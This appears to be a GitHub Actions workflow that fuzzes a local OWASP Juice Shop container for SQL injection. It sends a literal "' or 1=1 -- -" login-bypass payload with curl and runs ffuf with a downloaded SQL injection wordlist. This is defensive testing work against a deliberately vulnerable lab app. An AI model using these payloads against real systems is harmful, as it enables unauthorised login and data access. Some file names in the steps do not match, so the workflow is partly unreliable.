name: Fuzzing

on:
  push:
    branches: [ main ]

permissions:
  contents: write
  pull-requests: write
  security-events: write
  actions: read

jobs:
  ffuf:
    runs-on: ubuntu-latest
    services:
        juice:
          image: bkimminich/juice-shop
          ports:
            - 3000:3000
    steps:
      - name: Wait for service
        run: |
            sleep 10 
            curl --path-as-is -i -s -k -X $'POST' \
              -H $'Host: localhost:3000' -H $'Content-Length: 43' -H $'Content-Type: application/json' -H $'Connection: keep-alive' \
              --data-binary $'{\"email\":\"\' or 1=1 -- -\",\"password\":\"pass\"}' \
              $'http://localhost:3000/rest/user/login'

      - name: Get payloads
        run: |
          wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/SQL-Injection
      
      - name: Install fuzzing
        run: |
          go install github.com/ffuf/ffuf/v2@latest

      - name: Run FFUF directly
        run: $HOME/go/bin/ffuf \
          -u http://localhost:3000/rest/user/login \
          -X POST \
          -H "Content-Type: application/json" \
          -d '{"email":"FUZZ","password":"anothervalue"}' \
          -w sqli-payloads.txt \
          -mc 200 \
          -mr "authentication" \
          -t 10 \
          -o ffuf-result.json \
          -of json \
          -debug-log ffuf-debug.log

      - name: Parse and Show Results
        run: python3 -c "
import json
try:
    with open('ffuf-result.json') as f:
        data = json.load(f)
    results = data.get('results', [])
    print(f'=== Found {len(results)} potential hits ===')
    if results:
        for i, r in enumerate(results, 1):
            payload = r.get('input', {}).get('FUZZ', 'N/A')
            print(f'{i}. Payload: {payload} | Status: {r.get('status')} | Length: {r.get('length')}')
        print('::error::SQL Injection vector detected!')
        exit(1)
    else:
        print('No SQLi vectors detected.')
        exit(0)
except Exception as e:
    print(f'Error parsing results: {e}')
    exit(1)
"

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: security-reports-bundle
          path: |
            ffuf-result.json
            ffuf-debug.log
            juice-logs.log
